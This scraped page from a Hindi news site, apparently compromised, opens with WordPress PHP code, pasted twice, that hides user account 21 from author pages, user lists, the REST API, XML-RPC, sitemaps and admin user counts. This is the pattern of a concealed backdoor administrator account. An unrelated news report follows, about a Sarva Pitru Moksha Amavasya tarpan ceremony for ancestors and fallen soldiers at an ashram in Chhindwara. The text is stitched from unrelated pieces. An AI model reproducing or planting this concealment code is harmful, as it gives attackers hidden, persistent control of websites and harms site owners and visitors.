add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
सर्व पितृ मोक्ष अमावस्या ऋषि, देव, पितृ सहित शहीद हुये सैनिकों का किया तर्पण - Press Ki Taquat
No Result
View All Result
छिन्दवाड़ा(भगवानदीन साहू)- संस्कृत पुस्तौकोन्नति सभा द्वारा संचालित संत श्री आशारामजी आश्रम खजरी में आज सर्वपितृ मोक्ष अमावस्या के दिन ऋषि पितृ देव के साथ- साथ शहीद हुये सैनिकों का विधिवत तर्पण किया। हमारे शास्त्रों में पितृ पक्ष का विशेष महत्व है । हमारी उम्र का जब एक वर्ष पूर्ण होता है। तब पितृ लोक का एक दिन होता है। वे नींद से उठकर हमारे घर आते है । इसलिए उनकी तिथि पर उनका तर्पण करने का विधान है । किसी कारणवश वैदिक रूप से विधिवत तर्पण नहीं कर सकते तो श्रीमद भगवत गीता जी के सातवें अध्याय का पाठ कर पुण्य अर्पण करने का भी विधान है जिससे हमारे पितृ संतुष्ट होतें हैं। पितरों ने हमें नाम दिया , गोत्र दिया , शरीर दिया । हम सब उनके ऋणी हैं , उन सब को श्रद्धा से याद करना ही श्राध्द है । इस निमित प्रतिवर्ष खजरी आश्रम में यह आयोजन सम्पन्न होतें हैं। सभी साधकों ने कोविड-19 की गाइडलाइन का पालन करते हुये सर्वपितृ मोक्ष अमावस्या मनायी । आश्रम प्रबंधक द्वारा उच्च कोटि के ब्राम्हणों की एवं आचार्यों की व्यवस्था की गई जिन्होंने वैदिक रूप से पूजा अर्चना कर सभी का तर्पण करवाया । समिति के पदाधिकारियों ने कोरोना काल में जिले के प्रतिष्ठित गणमान्य नागरिकों एवं पत्रकारगणों के परिजन जिनका शरीर छुट गया है; उनका भी तर्पण किया । कार्यक्रम में हजारों लोगों ने उपस्थिति दर्ज की । सभी श्रद्धालुओं एवं ब्राह्मणों के भोजन की सेवा शक्ति ट्रस्ट द्वारा संचालित गुरुकुल के द्वारा की गई। इस दैवीय कार्य में अहमदाबाद आश्रम से आये उच्च कोटि के आचार्य लक्ष्मीकांत द्विवेदी, खजरी आश्रम के संचालक जयराम भाई समिति के अध्यक्ष मदन मोहन परसाई, गुरुकुल की संचालिका दर्शना खट्टर , महिला उत्थान आश्रम की संचालिका साध्वी नीलू बहन , लिंगा आश्रम की संचालिका साध्वी प्रतिमा बहन , साध्वी रेखा बहन, गुरुकुल प्रबंधक सुशील सिंह परिहार, युवा सेवा संघ के अध्यक्ष दीपक डोईफोडे मुख्य रूप से उपस्थित थे ।
Post Views: 126
No Result
View All Result